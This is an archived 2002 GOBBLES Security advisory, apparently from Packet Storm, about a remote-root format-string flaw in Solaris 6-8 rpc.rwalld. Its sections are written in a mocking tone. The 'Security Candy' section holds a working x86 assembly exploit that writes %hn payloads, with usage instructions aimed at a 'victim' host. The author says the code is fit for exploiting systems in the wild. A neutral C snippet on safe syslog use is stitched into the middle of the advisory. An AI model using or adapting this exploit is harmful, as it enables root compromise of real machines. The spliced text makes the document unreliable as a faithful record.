xwall.s

Published 08 Jul 2002. Reported by Gobbles Security. Type: packetstorm. Source: packetstormsecurity.com

Remote root vulnerability discovered in Solaris operating systems, exploit included in advisory.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
GOBBLES SECURITY ADVISORY #32  
  
ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!  
  
Foreword:  
<@route> so was fydor trying to make his code unreadable when he write nmap?  
<@route> or was that just the fallout of poor planning?  
<@route> this is awful  
<@route> if ( !victim || !sport || !dport || sd < 0) {  
<@route> fprintf(stderr, "send_udp_raw: One or more of your parameters  
suck!\n");  
<@route> free(packet);  
<@route> return -1;  
<@route> }  
<@route> This is the program that is used everywhere and written up in  
countless books?  
<@route> it's pretty much obscene that this program doesnt use libnet  
  
Systems Affected:  
Sun Solaris 6, Sun Solaris 7, Sun Solaris 8  
(sparc and x86 versions)  
  
  
Threat Level:  
Super duper high.  
  
  
Vendor Notification Status:  
Initial advisory sent to Sun Microsystems on Friday, April 5th.  
  
After long series of email exchange, Sun.com engineers finally begin working  
on developing patch for bug.  
  
Days later, CERT contact GOBBLES about bug. Dialogue happen then too with  
CERT. Both Sun Microsystems and CERT have promised to make sure that  
GOBBLES name is in both official advisories released. Hey, we do this for  
fame and attention, now that we are no longer weaned we must do something!  
  
Some time, full disclosure is real pain in ass. Everyone want more and more  
time to get things fixed before advisory is released. Time to grace lists  
with more GOBBLES Advisory.  
  
  
Exploit:  
A proof-of-concept exploit for this vulnerability has been attached to the  
bottom of this email. GOBBLES wrote it in way to keep unskilled from using  
it, like security assessment team from Vigilante who not able to tell if  
vulnerability is real or not in opensourced product after reading advisory.  
At the same time, skilled penetrators should not have any trouble using the  
code provided to exploit systems in the wild.  
  
Don't send GOBBLES email asking for other versions of exploit. Some things  
better left private and given to close friends for their own motivations.  
If you can't figure out how to work with this exploit and get remote root  
from what is provided in the advisory, really there is no reason for you to  
be using an exploit.  
  
  
A Few Words:  
There are some thing that GOBBLES have to say, some thing very heartfelt  
that he need to communicate to the world, some thing that best said in song,  
please take time to read lyric and understand what GOBBLES trying to say. . .  
  
"the sun has blessed  
the rays are gone  
and all the kids have left their tears and gone home,  
  
sweet 17, sour 29  
and i can't explain myself  
what i'd hoped to find  
you were all so kind  
when i was near,  
  
and if you're still feeling down  
then maybe you need me around  
to love and hold you  
don't say i hadn't told you so  
maybe you need me around,  
  
i had no luck  
i had no shame  
i had no cause  
just seventeen days of rain  
and you in my eyes,  
  
just one more song to slay this earth  
and i can't explain myself just what it's worth  
what was all i had  
but not all i'd need  
and i can't escape the fact that i still bleed,  
  
and if you're still feeling down  
and if this seems way too loud  
then maybe you need me around,  
  
i had no voice  
i had no drive  
i had no choice  
i've done my time  
had myself  
had my band  
i had my love  
had no hand in watching it all fall apart  
  
and if you're still feeling down  
then maybe you need me around  
to lift and scold you  
to send you crashing all right now  
maybe you need me around."  
  
-Blissed and Gone, the Smashing Pumpkins  
  
  
Description of Problem (Part One):  
One of the default RPC services in Sun Solaris versions 6-8 has an  
insecure syslog() statement, which allow remote attacker to execute custom  
code as root.  
  
Hehe, GOBBLES bet you getting pissed because in all this length of advisory,  
still no mention of what is vulnerable, hehehe, ;PPPPpppppppppppppppp. Keep  
control of temper, and keep reading, because you about to find out, hehehe  
GOBBLES is silly today.  
  
  
Remotely Exploitable:  
Yes.  
  
Locally Exploitable:  
Yes.  
  
Privilege Attained After Exploitation:  
Root.  
  
Exploit Included:  
As GOBBLES did mention previously, yes. It get you root. Girls will be  
impressed with mailing list reading skills and source code leeching  
technique utilized to gain remote root to Solaris machines. Included  
exploit for Sparc.  
  
  
Name of Vulnerable Service:  
$ grep rwall /etc/inetd.conf  
# The rwall server allows others to post messages to users on this machine.  
walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld  
  
It rwalld that vulnerable. It run as root. Attacker get root from  
exploiting it.  
  
  
Description of Problem (Part Two):  
Inside rwall_subr.c we see:  
  
    /*  
     * Make sure the wall programs exists, is executeable, and runs  
     */  
    if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||  
        (fp = popen(WALL_PROG, "w")) == NULL) {  
            syslog(LOG_NOTICE,  
                "rwall message received but could not execute %s",  
                WALL_PROG);  
            syslog(LOG_NOTICE, msg);  
  
Bug easy enough to spot, but now question is, "GOBBLES, friend, how is  
this to be exploited? Faulty syslog() only called if rpc.rwalld can not  
execute /usr/sbin/wall on local system, which mean it only exploitable if  
admin have chmod -x or rm /usr/sbin/wall or something like this, right, so  
why this so such a big deal?"  
  
To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if anything is  
to make popen() fail, there one other way to exploit bug, which make it  
dangerous and affect all installation of Solaris running rpc.rwalld, is that  
popen() to fail if there no available file descriptors on system."  
  
This easier to exploit locally on system. For remote exploitation, timing  
is important and thus is race condition. Each new tcp session to running  
service on target host will consume filedescriptor. Then run attached  
exploit to have root handed over, like operator status given to route in  
#phrack with no question ask.  
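The defect in the excerpt above is that the received wall message sits in the format position of syslog(); the fix is a fixed format with the message passed as a "%s" argument. As an added example, not code from the advisory or from Sun's rwalld, the following C stands in for syslog(3) with a same-shaped variadic function that renders into a buffer, so the vulnerable and hardened call patterns can be compared offline on a constructed message.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for syslog(3): same variadic shape, but renders into a caller
 * buffer so both call patterns can be compared offline. Returns the length
 * the full line would have, like vsnprintf(). */
static int fake_syslog(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    int len;

    va_start(ap, fmt);
    len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* rwall_subr.c pattern: the message received from the network *is* the
 * format string, so every '%' conversion in it is interpreted. */
int log_received_unsafe(char *out, size_t n, const char *msg)
{
    return fake_syslog(out, n, msg);
}

/* Hardened form: fixed format, the message travels only as a "%s"
 * argument and is copied literally. */
int log_received_safe(char *out, size_t n, const char *msg)
{
    return fake_syslog(out, n, "%s", msg);
}

/* Defensive pre-check before logging untrusted text: returns 1 if msg
 * holds a '%' that is not the harmless literal escape "%%", else 0. */
int contains_format_directive(const char *msg)
{
    const char *p;

    for (p = msg; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {
            p++;
            continue;
        }
        return 1;
    }
    return 0;
}
```

With the constructed message "backup 50%% complete" the unsafe path yields "backup 50% complete" (the "%%" was interpreted) while the safe path copies it verbatim.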
  
  
Patch Available:  
Fucked if GOBBLES knows.  
  
  
Suggested Workaround:  
GOBBLES suggest that admin disable rwalld from /etc/inetd.conf until patch  
made available, then restart it, if you wait until patch available until  
upgrade you probably have to do upgrade by reinstalling operating system,  
because now exploit out and probably in hands of less than ethical  
penetrator looking to abuse you in one way or another.  
  
  
Security Candy:  
  
-begin copy-  
  
/*  
Remote Root Exploit for Solaris 6-8 rpc.walld  
  
Usage Instructions:  
1. Compile.  
gcc -o xwall xwall.s  
2. Run.  
(./xwall ; ./shellcode) | rwall victim  
3. Late Easter egg.  
strings xwall  
  
Note(s):  
Something else must be done to consume FD's on  
victim system. Figure this one out for self.  
  
This exploit written to be run on Linux. Supplied  
format string is for Sparc Solaris. Provide own  
remote shellcode and use as above described.  
  
Love,  
GOBBLES Security  
http://www.bugtraq.org  
[email protected]  
*/  
  
  
retloc:  
	.long 0x41424344  
retaddr:  
	.long 0x60bb135  
padding:  
	.long 4  
walkcount:  
	.long 1  
	.globl main  
	.type main,@function  
main:  
	pusha  
	movl (padding),%ecx  
jusfhds7fg:  
	pushl %ecx  
	movl $4,%eax  
	movl $1,%ebx  
	pushl $0x00000041  
	movl %esp,%ecx  
	movl $1,%edx  
	int $0x80  
	popl %ecx  
	popl %ecx  
	loop jusfhds7fg  
	movl %esp,24(%esp)  
	pushl $0x42424242  
	movl $4,%edx  
	movl %esp,%ecx  
	movl $1,%ebx  
	movl $4,%eax  
	int $0x80  
	movl (retloc),%eax  
	bswapl %eax  
	pushl %eax  
	subl $4,%ecx  
	movl %edx,%eax  
	int $0x80  
	addl $4,%ecx  
	movl %edx,%eax  
	int $0x80  
	subl $4,%ecx  
	popl %eax  
	bswapl %eax  
	incl %eax  
	incl %eax  
	bswapl %eax  
	pushl %eax  
	movl %edx,%eax  
	int $0x80  
	popl %eax  
	movl %esp,%edx  
	incl %edx  
	xorl %esi,101(%ebp)  
	andb %al,111(%edx)  
	popa  
	pushl %edx  
	andb %al,97(%ebx)  
	decl %esi  
	aaa  
	andb %al,111(%ebx)  
	incl %esp  
	xorl (%ecx),%eax  
	movl (walkcount),%ecx  
	cmpl $0,%ecx  
	je nczxhczjcg89zg89  
	pushl %ecx  
	movl $4,%edx  
	movl $1,%ebx  
	pushl $0x78382e25  
cmzxnczxcz8c:  
	pushl %ecx  
	movl %esp,%ecx  
	addl $4,%ecx  
	movl $4,%eax  
	int $0x80  
	popl %ecx  
	loop cmzxnczxcz8c  
	popl %ecx  
	popl %ecx  
nczxhczjcg89zg89:  
	movl (retaddr),%edx  
	pushl %edx  
	shr $16,%edx  
	subl %edx,(%esp)  
	movw $0,2(%esp)  
	pushl %edx  
	shll $3,%ecx  
	subl %ecx,(%esp)  
	movl (padding),%edx  
	subl %edx,(%esp)  
	subl $16,(%esp)  
	movw $0,2(%esp)  
	pushl $cznxczxczxh8  
	call printf  
	movl $1,%eax  
	int $0x80  
cznxczxczxh8:  
	.string "%%%uc%%hn%%%uc%%hn\n"  
  
-begin paste-  
  
  
Greets:  
route, because route deserves attention, use libnet it rulez. route, why  
you refuse GOBBLES interview on supposed intrusion on @stake subnet that was  
allowed when some malicious local user ran trojaned blackhat warez? GOBBLES  
need to confirm with you if this really did happen, please respond soon...  
  
[email protected], the Official Sysadmin Mascot of GOBBLES Security. Thanks for  
letting GOBBLES know to cut out the "leet gr33tz" from advisory, now people  
hold lots of respect for GOBBLES. Thanks Tracy, you're a peach. Next  
advisory will be disclosure of 0day CSS holes in mp3.com's website...  
  
w00w00 Security Development, publishing advisories at the blinding speed of  
1 per 3 years, and still being the largest active nonprofit security group in  
the world, to the eyes of the public. Disclosure is good when it serve a  
political agenda, hehehehe...  
  
The Securityfocus Staff, who often reject the legitimate research materials  
of GOBBLES from their lists, but make sure they archive it on their website  
anyways. Thanks for at least giving us some of the credit that we deserve.  
In the future, though, if our submissions don't meet your requirements for  
publication on the lists, don't put them on your website. Enough of this  
double standards bullshit.  
  
zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect.  
  
and finally, the beautiful Jennifer Garner, who play Sydney Bristow in tv  
show Alias, who many member of GOBBLES Security is in love with. You win free  
GOBBLES Security tshirt, come to defcon in August to get it, hehehehehehe!  
  
  
  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: Hush 2.1  
Note: This signature can be verified at https://www.hushtools.com  
  
wlwEARECABwFAjzOnwwVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPt4sA  
n0+78j2dzLIufxrdL5A8GcqG/ZPnAKCAnpQVJKw3PYNFN9fFjEfBcGCruQ==  
=jCTV  
-----END PGP SIGNATURE-----  
  
